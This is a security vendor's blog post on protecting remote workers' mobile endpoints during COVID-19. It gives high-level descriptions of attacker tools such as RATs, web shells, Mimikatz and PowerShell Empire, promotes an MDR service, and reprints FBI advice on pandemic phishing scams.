Now More Than Ever: Hackers Want Endpoints
Hackers understand the global pandemic we are currently experiencing. They also know that whatever you are NOT focused on defending, and they will flow like water to get to it.
Where are you not focused as a defender? That’s where the hacker will go.
Since working remotely has been mandated to slow the spread of COVID-19, focus on your users’ endpoints.
According to the 2019 Data Breach Investigations Report, 94% of all attacks start with email. Be aware that even more users will click on malicious links when they are using their mobile devices.
Mobile Devices Users are More Vulnerable to Phishing Attacks
According to a recent mobile phishing report, there is an 85% increase annually on the rate at which people are falling for phishing attacks on mobile.
Mobile devices are connected outside traditional firewalls, typically lack endpoint security solutions, and access a plethora of new messaging platforms not used on desktops. Additionally, the mobile user interface does not have the depth of detail needed to identify phishing attacks, such as hovering over hyperlinks to show the destination.
As a result, mobile users are three times more likely to fall for phishing scams, according to IBM.
Finally, the huge amount of personal and corporate data on mobile devices is making these devices the preferred target for phishing attacks.
In fact, in spite of being protected by traditional phishing protection and education, 56% of Lookout users received and tapped a phishing URL on their mobile device between 2011–2016. Fortunately, in these cases the attack was thwarted by Lookout.Before enterprises can achieve comprehensive protection against phishing attacks across all vectors, including the mobile device, security and IT professionals need to understand how current phishing myths muddy the waters and get the facts that will help them make informed decisions on how to protect corporate data.
Hackers’ Capabilities
It’s difficult for users to keep up with the hacker’s capabilities. As a corporation, you could potentially have a team of security experts on hand that are able to research those capabilities and be able to help you put a defense strategy in place. Attackers are using the following tools to breach your mobile devices:
Remote Access Trojans (RAT)
A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. RATs are usually downloaded invisibly with a user-requested program — such as a game — or sent as an email attachment. Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a botnet. Source
Web Shells
A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.
A web shell can be written in any language that the target web server supports. The most commonly observed web shells are written in languages that are widely supported, such as PHP and ASP. Perl, Ruby, Python, and Unix shell scripts are also used. Source
Mimikatz
Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket or building Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers. Source
Powershell Empire
PowerShell Empire is a unique attack framework in that its capabilities and behaviors closely resemble those used by current nation-state advanced persistent threat actors.
Nation-state hacking groups were using PowerShell to create fileless malware that runs in a computer’s memory, without leaving any traces on disk, and using PowerShell scripts as a post-exploitation vector for moving through networks and inside workstations without triggering any security alerts.
Because PowerShell is installed by default on all Windows 7 and later versions, at the time, the app was trusted by all security products, many of which did not detect Powershell-based attacks.
Empire’s use among cybercriminals has grown so much in the past few years that in late 2018, the UK’s National Cyber Security Center included Empire on its shortlist of the five most dangerous publicly available hacking tools — together with JBiFrost, Mimikatz, China Chopper, and HTran. Source
C2 Obfuscation Tools
Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools (e.g., Tor) or more specific tools to obfuscate their location.
HUC Packet Transmitter (HTran) is a proxy tool used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the internet since at least 2009.
HTran facilitates TCP connections between the victim and a hop point controlled by a threat actor. Malicious threat actors can use this technique to redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network. Source
How to Protect Mobile Devices for Remote Workers
For a comprehensive mobile device protection strategy, you need a tool or service for endpoints that can offer a form of antivirus, an EDR-type tool that can record and log instances for future forensics, as well as vulnerability management for mobile.
Your mobile device security strategy should provide phishing protection for:
– Email
– SMS
– Social Media
– Messaging Apps
You should also consider Mobile Threat Defense that defends against:
– Application Threats
– Device Threats
– Network Threats
Managed Detection and Remediation (MDR) for Endpoint Security
Not only does MDR from Cybriant help reduce the time between breach and detection, we can also help stop the threat before it can fully execute.
By tracking all processes, our team is able to detect malicious activities, and use behavioral AI technology to respond at top speed. We can detect and stop file-based malware, scripts, weaponized documents, lateral movement, file-less malware, and even zero-days.
With MDR from Cybriant, our security analysts monitor your endpoints 24/7 and filter out false positives. You’ll receive the alerts when relevant threats are detected along with advice and insight from our cyber security team to help you mitigate and respond to the threat.
As an extension of your team, our experts will investigate, triage, and remediate security events and provide executive-level reporting. Remediation may reveal dormant or trojan threat actors that evade network and endpoint detection solutions. Our MDR solution includes leveraging the talents of our experienced team as well as next-generation antivirus and EDR tools that utilize AI.
The MDR service from Cybriant will allow you to protect your organization’s data and reduce your threat landscape against the most advanced threats.
Security Fundamentals for Working Remotely
Consider sharing this information from Infragard to all your remote workers. Stay up-to-date on Coronavirus scams here.
Cyber Risks/Criminals: The FBI reports scammers are leveraging the COVID-19 pandemic to steal your money and your personal information, or both. Protect yourself and do your research before clicking on links purporting to provide information on the virus; donating to a charity online or through social media; contributing to a crowdfunding campaign; purchasing products online; or giving up your personal information to receive money or other benefits.
The FBI advises you to be on the lookout for the following:
FAKE CDC EMAILS – Watch out for emails claiming to be from the Centers for Disease Control and Prevention (CDC) or other organizations claiming to offer information on the virus. Do not click links or open attachments you do not recognize. Fraudsters can use links in emails to deliver malware to your computer to steal personal information or to lock your computer and demand payment. Be wary of websites and apps claiming to track COVID-19 cases worldwide. Criminals are using malicious websites to infect and lock devices until payment is received.
PHISHING EMAILS – Look out for phishing emails asking you to verify your personal information to receive an economic stimulus check from the government. While talk of economic stimulus checks has been in the news cycle, government agencies are not sending unsolicited emails seeking your private information to send you money. Phishing emails may also claim to be related to charitable contributions, general financial relief, airline carrier refunds, fake cures and vaccines, and fake testing kits.
COUNTERFEIT TREATMENTS OR EQUIPMENT – Be cautious of anyone selling products that claim to prevent, treat, diagnose, or cure COVID-19. Be alert to counterfeit products such as sanitizing products and Personal Protective Equipment (PPE), including N95 respirator masks, goggles, full face shields, protective gowns, and gloves. More information on unapproved or counterfeit PPE can be found at www.cdc.gov/niosh. You can also find information on the U.S. Food and Drug Administration website, www.fda.gov and the Environmental Protection Agency website, www.epa.gov. Report counterfeit products at www.ic3.gov and to the National Intellectual Property Rights Coordination website at iprcenter.gov
Best Practices for Companies: Attached is a one-page document, developed by InfraGard National Board Director Rusty Sailors and his company, listing best cyber practices for companies to adopt, to ensure their information is kept safe and secure at all times.
In addition to those recommendations, the FBI is reminding people to always use good cyber hygiene and security measures. By remembering the following tips, you can protect yourself and help stop criminal activity:
- Do not open attachments or click links within emails from senders you don’t recognize.
- Do not provide your username, password, date or birth, social security number, financial data, or other personal information in response to an email or robocall.
- Always verify the web address of legitimate websites and manually type them into your browser.
- Check for misspellings or wrong domains within a link (for example, an address that should end in a “.gov” ends in “.com” instead
As the world is responding to the global response for remote work options, we’re here to provide guidance and stability during these trying times.
Whether provisioning corporate laptops or allowing employees to use personal devices, hastily extending a remote work option can leave your organization vulnerable in terms of security.
Here are a few items to consider:
Remote Basics
– A computer
– A secure internet connection
– Chat and conferencing applications
– A dedicated workspace
– A phone and a camera
– Self-motivation and discipline
– A strict routine
Require VPN access for internal networks
A VPN encrypts your corporate traffic to avoid man-in-the-middle attacks or eavesdroppers
Update Password Policies
Make sure your employees understand and comply with your password policies. This might be the best time to start with new strong passwords across the company.
Separate User Account
If your group in using their own devices, require a new user account to be set up for work use only. This separation will help both privacy and security.
Invest in full-featured endpoint security for home workers
Home systems are varied and more often than not, are not up to the job of protecting your company’s assets. The best options would still be business-class endpoint security that can be managed by your IT team that leverages a firewall, protection from malicious websites, and malware.
Require multi-factor authentication
Your best defense against cyber criminals that may utilize brute-force techniques or stolen credentials.
Require encryption
If employees are working on sensitive files or downloading files to their personal devices, provide an encryption solution while requiring separation of personal files.
Keep machines up to date
It is difficult to know how well employees keep their home machines up to date. Enable automated updates on all of their systems to be sure they are current with all security measures.
Employee Training
COVID-19 Scams are on the rise and are becoming more sophisticated. Remote workers’ habits and behaviors can become lax when it comes to clicking on links. Provide a refresher to help avoid the human element that cybercriminals attempt to exploit. Consider running a campaign and training course before employees begin working remotely or shortly thereafter.